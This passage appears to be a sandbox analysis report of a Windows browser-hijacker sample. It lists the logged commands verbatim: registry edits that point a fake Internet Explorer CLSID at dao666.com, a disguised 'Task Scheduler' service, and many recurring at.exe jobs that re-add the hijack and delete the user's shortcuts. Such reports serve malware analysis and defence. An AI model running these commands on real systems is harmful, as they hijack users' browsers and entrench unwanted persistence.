          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
          PID: 2700
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
          PID: 3888
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
          PID: 5004
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://dao666.com/?ha" /f
          PID: 4960
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"
          PID: 3568
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
          PID: 740
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
          PID: 1696
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
          PID: 2072
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
          PID: 5060
          - Modifies registry class

      [4] C:\Windows\SysWOW64\reg.exe
          command: REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
          PID: 4664

    [3] C:\Windows\SysWOW64\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /C .\copy.cmd
        PID: 4340
        - Drops file in Program Files directory

    [3] C:\Windows\SysWOW64\cmd.exe
        command: "C:\Windows\System32\cmd.exe" /C .\run.cmd
        PID: 2312

      [4] C:\Windows\SysWOW64\sc.exe
          command: sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
          PID: 5096
          - Launches sc.exe

      [4] C:\Windows\SysWOW64\sc.exe
          command: sc config Schedule start= auto
          PID: 3368
          - Launches sc.exe

      [4] C:\Windows\SysWOW64\net.exe
          command: net start "Task Scheduler"
          PID: 1644

        [5] C:\Windows\SysWOW64\net1.exe
            command: C:\Windows\system32\net1 start "Task Scheduler"
            PID: 3188

      [4] C:\Windows\SysWOW64\at.exe
          command: at 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 5100

      [4] C:\Windows\SysWOW64\at.exe
          command: at 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 2476

      [4] C:\Windows\SysWOW64\at.exe
          command: at 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 3660

      [4] C:\Windows\SysWOW64\at.exe
          command: at 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 1740

      [4] C:\Windows\SysWOW64\at.exe
          command: at 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4456

      [4] C:\Windows\SysWOW64\at.exe
          command: at 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 4900

      [4] C:\Windows\SysWOW64\at.exe
          command: at 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 2412

      [4] C:\Windows\SysWOW64\at.exe
          command: at 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4732

      [4] C:\Windows\SysWOW64\at.exe
          command: at 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 2184

      [4] C:\Windows\SysWOW64\at.exe
          command: at 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 3040

      [4] C:\Windows\SysWOW64\at.exe
          command: at 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4980

      [4] C:\Windows\SysWOW64\at.exe
          command: at 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 1908

      [4] C:\Windows\SysWOW64\at.exe
          command: at 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 4048

      [4] C:\Windows\SysWOW64\at.exe
          command: at 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 1688

      [4] C:\Windows\SysWOW64\at.exe
          command: at 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 3984

      [4] C:\Windows\SysWOW64\at.exe
          command: at 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 2228

      [4] C:\Windows\SysWOW64\at.exe
          command: at 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 2248

      [4] C:\Windows\SysWOW64\at.exe
          command: at 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 2656

      [4] C:\Windows\SysWOW64\at.exe
          command: at 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 4692

      [4] C:\Windows\SysWOW64\at.exe
          command: at 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4528

      [4] C:\Windows\SysWOW64\at.exe
          command: at 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 3008

      [4] C:\Windows\SysWOW64\at.exe
          command: at 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 4468

      [4] C:\Windows\SysWOW64\at.exe
          command: at 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 1472

      [4] C:\Windows\SysWOW64\at.exe
          command: at 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 3504

      [4] C:\Windows\SysWOW64\at.exe
          command: at 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 2528

      [4] C:\Windows\SysWOW64\at.exe
          command: at 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 2276

      [4] C:\Windows\SysWOW64\at.exe
          command: at 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 4968

      [4] C:\Windows\SysWOW64\at.exe
          command: at 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 636

      [4] C:\Windows\SysWOW64\at.exe
          command: at 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 3120

      [4] C:\Windows\SysWOW64\at.exe
          command: at 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 2456

      [4] C:\Windows\SysWOW64\at.exe
          command: at 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 2960

      [4] C:\Windows\SysWOW64\at.exe
          command: at 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 2684

      [4] C:\Windows\SysWOW64\at.exe
          command: at 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 2200

      [4] C:\Windows\SysWOW64\at.exe
          command: at 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 3068

      [4] C:\Windows\SysWOW64\at.exe
          command: at 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4244

      [4] C:\Windows\SysWOW64\at.exe
          command: at 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"
          PID: 2408

      [4] C:\Windows\SysWOW64\at.exe
          command: at 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
          PID: 4540

      [4] C:\Windows\SysWOW64\at.exe
          command: at 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"
          PID: 4948
-
-
C:\Windows\SysWOW64\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3696
-
-
C:\Windows\SysWOW64\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3520
-
-
C:\Windows\SysWOW64\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4484
-
-
C:\Windows\SysWOW64\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1072
-
-
C:\Windows\SysWOW64\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:3896
-
-
C:\Windows\SysWOW64\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4644
-
-
C:\Windows\SysWOW64\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:1748
-
-
C:\Windows\SysWOW64\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1580
-
-
C:\Windows\SysWOW64\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"4⤵PID:4084
-
-
C:\Windows\SysWOW64\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"4⤵PID:3048
-
-
C:\Windows\SysWOW64\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explore*.*"4⤵PID:1576
-
-
C:\Windows\SysWOW64\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explore*.*"4⤵PID:3188
-
-
C:\Windows\SysWOW64\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"4⤵PID:1440
-
-
C:\Windows\SysWOW64\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:2216
-
-
C:\Windows\SysWOW64\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:552
-
-
C:\Windows\SysWOW64\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4072
-
-
C:\Windows\SysWOW64\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:1740
-
-
C:\Windows\SysWOW64\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:3824
-
-
C:\Windows\SysWOW64\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:2428
-
-
C:\Windows\SysWOW64\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4820
-
-
C:\Windows\SysWOW64\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:3704
-
-
C:\Windows\SysWOW64\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:1612
-
-
C:\Windows\SysWOW64\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:2184
-
-
C:\Windows\SysWOW64\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:5100
-
-
C:\Windows\SysWOW64\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:4304
-
-
C:\Windows\SysWOW64\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"4⤵PID:4024
-
-
C:\Windows\SysWOW64\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"4⤵PID:484
-
-
C:\Windows\SysWOW64\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdlt\is.cmd4⤵PID:4048
-
-
C:\Windows\SysWOW64\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"4⤵PID:5108
-
-
C:\Windows\SysWOW64\at.exeat 9:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:3412
-
-
C:\Windows\SysWOW64\at.exeat 14:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:4716
-
-
C:\Windows\SysWOW64\at.exeat 18:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:4712
-
-
C:\Windows\SysWOW64\at.exeat 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵PID:2248
-
-
-
Network
MITRE ATT&CK Enterprise v6
Downloads